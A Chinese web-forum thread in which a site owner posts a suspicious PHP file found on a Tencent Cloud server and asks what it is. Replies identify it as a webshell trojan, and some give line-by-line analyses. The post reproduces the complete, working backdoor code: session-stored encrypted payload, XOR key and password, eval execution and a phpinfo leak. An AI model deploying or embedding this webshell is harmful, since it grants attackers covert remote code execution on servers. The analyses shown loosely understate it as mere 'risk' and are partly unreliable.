·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

腾讯云提示我服务器自己多了个病毒文件,麻烦帮我看看是不是

72 7
发表于 昨天 21:47 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
if(isset($_GET['phpinfo'])) {
    phpinfo();
        }
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
                  $_SESSION[$payloadName]=encode($data,$key);
              }
          }
      }
exit('77770123');
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论7

TyCodingLv.8 发表于 昨天 21:47 | 查看全部
麻烦帮忙看看这是想干嘛?
我要说一句 收起回复
婷姐楼主Lv.8 发表于 昨天 21:48 | 查看全部
禁用错误报告和时间限制,隐藏潜在的问题。
可能泄露服务器配置信息。
执行任意代码,可能导致远程代码执行(RCE)漏洞。
使用Base64编码和解码,可能用于隐藏恶意内容。
使用MD5哈希和分割输出,可能是为了混淆和验证。
我要说一句 收起回复
拾光Lv.8 发表于 昨天 21:48 | 查看全部
典型的PHP一句话变种木马  直接删了就是
我要说一句 收起回复
婷姐楼主Lv.8 发表于 昨天 21:49 | 查看全部
这段PHP代码包含了多个潜在的安全漏洞,主要用于处理会话、解码并执行经过特定加密的输入数据。
我要说一句 收起回复
拾光Lv.8 发表于 昨天 21:49 | 查看全部
用ai分析下就知道了
我要说一句 收起回复
CrystαlLv.8 发表于 昨天 21:49 | 查看全部
这段代码是一个PHP脚本,它包含了一些安全风险和潜在的恶意行为。以下是对代码的逐行分析:

1. `@session_start();`:启动一个新的会话或恢复现有的会话。
2. `@set_time_limit(0);`:设置脚本的最大执行时间为0,意味着没有时间限制。
3. `@error_reporting(0);`:关闭错误报告。
4. `if(isset($_GET['phpinfo'])) { phpinfo(); }`:如果GET请求中包含`phpinfo`参数,则显示PHP信息,这通常用于调试,但在生产环境中是不安全的。
5. `function encode($D,$K){ ... }`:定义了一个名为`encode`的函数,它接受两个参数`$D`和`K`,并对`$D`进行异或加密,使用`$K`作为密钥。
6. `$pass='pass';`:定义了一个变量`$pass`,值为`'pass'`。
7. `$payloadName='payload';`:定义了一个变量`$payloadName`,值为`'payload'`。
8. `$key='3c6e0b8a9c15224a';`:定义了一个变量`$key`,值为一个十六进制字符串,用作加密密钥。
9. `if (isset($_POST[$pass])){ ... }`:检查POST请求中是否存在名为`pass`的参数。
10. `$data=encode(base64_decode($_POST[$pass]),$key);`:对POST请求中的`pass`参数进行Base64解码,然后使用`encode`函数进行加密。
11. `if (isset($_SESSION[$payloadName])){ ... }`:检查会话中是否存在名为`payload`的变量。
12. `$payload=encode($_SESSION[$payloadName],$key);`:如果存在,使用`encode`函数对`payload`进行加密。
13. `if (strpos($payload,"getBasicsInfo")===false){ ... }`:检查加密后的`payload`中是否不包含字符串`"getBasicsInfo"`。
14. `eval($payload);`:如果`payload`中不包含`"getBasicsInfo"`,则执行`eval`函数,这允许执行PHP代码,是一个严重的安全风险。
15. `echo substr(md5($pass.$key),0,16);`:输出`$pass`和`$key`的MD5哈希值的前16个字符。
16. `echo base64_encode(encode(@run($data),$key));`:对`$data`执行一个名为`@run`的函数(这个函数在代码中没有定义),然后对结果进行Base64编码和加密,最后输出。
17. `echo substr(md5($pass.$key),16);`:输出`$pass`和`$key`的MD5哈希值的后16个字符。
18. `}else{ ... }`:如果会话中不存在`payload`,则检查`$data`中是否包含`"getBasicsInfo"`。
19. `$_SESSION[$payloadName]=encode($data,$key);`:如果`$data`中包含`"getBasicsInfo"`,则将`$data`加密后存储在会话中的`payload`变量中。
20. `exit('77770123');`:脚本执行完毕后输出字符串`'77770123'`并退出。

总结:这段代码是一个潜在的恶意脚本,它包含了远程代码执行(RCE)的风险,因为它使用了`eval`函数。此外,它还可能用于执行加密和Base64编码的数据,这可能是为了隐藏恶意行为或绕过安全检查。这个脚本应该被视为不安全,不应该在任何生产环境中运行。
我要说一句 收起回复
拾光Lv.8 发表于 昨天 21:49 | 查看全部
这段代码是一个 PHP 脚本,具有一些安全隐患,并可用于处理编码和解码数据。以下是对代码的详细分析:

### 代码结构分析

1. **会话和错误处理**:
   ```php
   @session_start();
   @set_time_limit(0);
   @error_reporting(0);
   ```
   - `session_start()`:开始一个新的会话或继续已有会话。
   - `set_time_limit(0)`:没有时间限制,脚本会一直执行到完成。
   - `error_reporting(0)`:关闭错误报告,可能是为了避免在输出中暴露信息。

2. **PHP信息功能**:
   ```php
   if(isset($_GET['phpinfo'])) {
       phpinfo();
   }
   ```
   - 当请求 URL 中包含 `phpinfo` 参数时,输出 PHP 配置信息。
   - 这是一种非常不安全的做法,因为它会泄露系统信息。

3. **编码函数**:
   ```php
   function encode($D, $K) {
       for ($i = 0; $i < strlen($D); $i++) {
           $c = $K[$i + 1 & 15];
           $D[$i] = $D[$i] ^ $c;
       }
       return $D;
   }
   ```
   - `encode` 函数接受两个参数 `$D`(数据)和 `$K`(密钥)。
   - 它通过将数据的每个字符与密钥中的对应字符进行异或(XOR)来对数据进行加密/解密。
   - 注意 `&` 的优先级和操作会导致意外的结果。

4. **变量定义**:
   ```php
   $pass = 'pass';
   $payloadName = 'payload';
   $key = '3c6e0b8a9c15224a';
   ```
   - 这里定义了一些常量字符串, `$pass` 用于检验 POST 请求, `$payloadName` 和 `$key` 用于存储和加密数据。

5. **POST 请求处理**:
   ```php
   if (isset($_POST[$pass])) {
       $data = encode(base64_decode($_POST[$pass]), $key);
       // ...
   }
   ```
   - 如果 POST 请求包含名为 `'pass'` 的字段,代码会对该字段进行 `base64_decode` 解码并使用 `encode` 函数处理。

6. **会话处理和运行代码**:
   ```php
   if (isset($_SESSION[$payloadName])) {
       $payload = encode($_SESSION[$payloadName], $key);
       if (strpos($payload, "getBasicsInfo") === false){
           $payload = encode($payload, $key);
       }
       eval($payload);
       echo substr(md5($pass.$key), 0, 16);
       echo base64_encode(encode(@run($data), $key));
       echo substr(md5($pass.$key), 16);
   }
   ```
   - 如果会话中有保存的 `'payload'`,将对其进行解码,并可能会运行 `eval($payload)`,执行其中的 PHP 代码。
   - 使用 `eval()` 是极其危险的,因为它允许执行任意代码。

7. **数据存储**:
   ```php
   else {
       if (strpos($data, "getBasicsInfo") !== false) {
           $_SESSION[$payloadName] = encode($data, $key);
       }
   }
   ```
   - 如果接收到的数据中包含 `'getBasicsInfo'` 关键字,则将处理后的数据保存到会话中。

8. **退出**:
   ```php
   exit('77770123');
   ```
   - 脚本结束时会输出 `77770123` 字符串。

### 安全隐患

- **使用 `eval()`**:这个函数执行字符串中的 PHP 代码,若攻击者可以注入 PHP 代码,可能导致远程代码执行漏洞。
- **PHP信息泄露**:输出 `phpinfo()` 会暴露大量敏感信息。
- **绕过错误报告**:关闭错误报告可能使得调试困难,也可能掩盖潜在的安全问题。
- **无身份验证检查**:该代码未对用户进行身份验证,任何了解此 URL 的用户都可以访问功能。

### 总结

整体来看,这段代码存在严重的安全隐患,尤其是调用 `eval()` 和 `phpinfo()` 的部分。若在生产环境中使用,存在较大安全风险,极易成为攻击目标。这种代码应尽量避免使用,并采取必要的安全措施。
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.145.201.79,GMT+8, 2024-11-9 00:51 , Processed in 0.248785 second(s), 112 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表